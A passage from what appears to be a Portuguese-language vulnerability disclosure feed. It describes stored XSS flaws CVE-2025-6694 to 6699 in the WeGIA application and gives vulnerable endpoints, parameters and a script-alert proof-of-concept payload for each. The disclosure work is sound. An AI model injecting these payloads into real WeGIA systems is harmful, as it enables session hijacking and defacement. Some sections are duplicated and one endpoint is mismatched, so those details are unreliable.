</span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6694/image.png" width="1896" height="993" srcset="/p/cve-2025-6694/image_hu_aa98354b3826b69.png 480w, /p/cve-2025-6694/image_hu_f42a65e996076c92.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="458px" /></p> <p><img src="/p/cve-2025-6694/image-1.png" width="1879" height="990" srcset="/p/cve-2025-6694/image-1_hu_ee83094dec5adefe.png 480w, /p/cve-2025-6694/image-1_hu_384fcc464a1d2a6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <p><img src="/p/cve-2025-6694/image-2.png" width="1884" height="976" srcset="/p/cve-2025-6694/image-2_hu_a237a910db38d115.png 480w, /p/cve-2025-6694/image-2_hu_afe9be25709c469f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <p><img src="/p/cve-2025-6694/image-3.png" width="1890" height="988" srcset="/p/cve-2025-6694/image-3_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6694/image-3_hu_547e87c56180f7a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://www.youtube.com/watch?v=X7DJmOtNqxU" target="_blank" rel="noopener" >https://www.youtube.com/watch?v=X7DJmOtNqxU</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6695/ https://www.cvehunters.com/pt/p/cve-2025-6695/ <h2 id="cve-2025-6695-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_categoriaphp-parâmetro-categoria">CVE-2025-6695: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_categoria.php</code> parâmetro <code>Categoria</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6695" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6695</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_categoria.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Categoria</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_categoria.php</code></p><h2 id="cve-2025-6695-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_categoriaphp-parâmetro-categoria">CVE-2025-6695: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_categoria.php</code> parâmetro <code>Categoria</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6695" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6695</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_categoria.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Categoria</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_categoria.php</code></p> <p>Parâmetro: <code>Categoria</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Categoria</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6695/image.png" width="1911" height="992" srcset="/p/cve-2025-6695/image_hu_fe6ecfa94b00b912.png 480w, /p/cve-2025-6695/image_hu_707ca28be50f53f5.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6695/image-1.png" width="1890" height="988" srcset="/p/cve-2025-6695/image-1_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6695/image-1_hu_547e87c56180f7a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/VZs4hmHYaXQ" target="_blank" rel="noopener" >https://youtu.be/VZs4hmHYaXQ</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6696/ https://www.cvehunters.com/pt/p/cve-2025-6696/ <h2 id="cve-2025-6696-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_atendidophp-parâmetro-cpf">CVE-2025-6696: Cross-Site Scripting (XSS) Armazenado no endpoint <code>Cadastro_Atendido.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6696" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6696</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>Cadastro_Atendido.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/atendido/Cadastro_Atendido.php</code></p><h2 id="cve-2025-6696-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_atendidophp-parâmetro-cpf">CVE-2025-6696: Cross-Site Scripting (XSS) Armazenado no endpoint <code>Cadastro_Atendido.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6696" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6696</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>Cadastro_Atendido.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/atendido/Cadastro_Atendido.php</code></p> <p>Parâmetro: <code>cpf</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>cpf</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6696/image.png" width="1896" height="977" srcset="/p/cve-2025-6696/image_hu_ffda6c40e75d1bcf.png 480w, /p/cve-2025-6696/image_hu_278d1476974e3453.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-6696/image-1.png" width="1918" height="995" srcset="/p/cve-2025-6696/image-1_hu_eda3fb9ed78bea61.png 480w, /p/cve-2025-6696/image-1_hu_c818ef974e37dd7b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/BCqqmDk0pH8" target="_blank" rel="noopener" >https://youtu.be/BCqqmDk0pH8</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6697/ https://www.cvehunters.com/pt/p/cve-2025-6697/ <h2 id="cve-2025-6697-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tipoentradaphp-parâmetro-tipo">CVE-2025-6697: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_tipoEntrada.php</code> parâmetro <code>Tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6697" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6697</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_tipoEntrada.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_tipoEntrada.php</code></p><h2 id="cve-2025-6697-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tipoentradaphp-parâmetro-tipo">CVE-2025-6697: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_tipoEntrada.php</code> parâmetro <code>Tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6697" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6697</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_tipoEntrada.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_tipoEntrada.php</code></p> <p>Parâmetro: <code>Tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6697/image.png" width="1875" height="985" srcset="/p/cve-2025-6697/image_hu_82b56e56e1511981.png 480w, /p/cve-2025-6697/image_hu_96dbb15382131ebf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-6697/image-1.png" width="1884" height="997" srcset="/p/cve-2025-6697/image-1_hu_a8c1f483e3ef6844.png 480w, /p/cve-2025-6697/image-1_hu_97a661a9facc76a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="188" data-flex-basis="453px" /></p> <p><img src="/p/cve-2025-6697/image-2.png" width="1909" height="987" srcset="/p/cve-2025-6697/image-2_hu_ca33285700be848f.png 480w, /p/cve-2025-6697/image-2_hu_6a491cc29a99a3e4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="464px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/BRqtS1octSQ" target="_blank" rel="noopener" >https://youtu.be/BRqtS1octSQ</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6698/ https://www.cvehunters.com/pt/p/cve-2025-6698/ <h2 id="cve-2025-6698-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tiposaidaphp-parâmetro-tipo">CVE-2025-6698: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_tipoSaida.php</code> parâmetro <code>Tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6698" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6698</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_tipoSaida.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_tipoSaida.php</code></p><h2 id="cve-2025-6698-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tiposaidaphp-parâmetro-tipo">CVE-2025-6698: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_tipoSaida.php</code> parâmetro <code>Tipo</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6698" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6698</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_tipoSaida.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_tipoSaida.php</code></p> <p>Parâmetro: <code>Tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6698/image.png" width="1884" height="988" srcset="/p/cve-2025-6698/image_hu_1a5d7d99e108196e.png 480w, /p/cve-2025-6698/image_hu_b87867b672dc8af6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="457px" /></p> <p><img src="/p/cve-2025-6698/image-1.png" width="1840" height="1004" srcset="/p/cve-2025-6698/image-1_hu_f50f1b60b1eb092b.png 480w, /p/cve-2025-6698/image-1_hu_4f105eec7cbf26e6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="439px" /></p> <p><img src="/p/cve-2025-6698/image-2.png" width="1887" height="994" srcset="/p/cve-2025-6698/image-2_hu_fb4627698ac6d751.png 480w, /p/cve-2025-6698/image-2_hu_e95ed4393ffc5db8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/7P5YT5MwCjg" target="_blank" rel="noopener" >https://youtu.be/7P5YT5MwCjg</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6699/ https://www.cvehunters.com/pt/p/cve-2025-6699/ <h2 id="cve-2025-6699-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_funcionariophp-parâmetro-cpf">CVE-2025-6699: Cross-Site Scripting (XSS) Armazenado no endpoint <code>cadastro_funcionario.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6699" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6699</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>cadastro_funcionario.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/atendido/Cadastro_Atendido.php</code></p><h2 id="cve-2025-6699-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_funcionariophp-parâmetro-cpf">CVE-2025-6699: Cross-Site Scripting (XSS) Armazenado no endpoint <code>cadastro_funcionario.php</code> parâmetro <code>cpf</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6699" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6699</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>cadastro_funcionario.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>cpf</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" 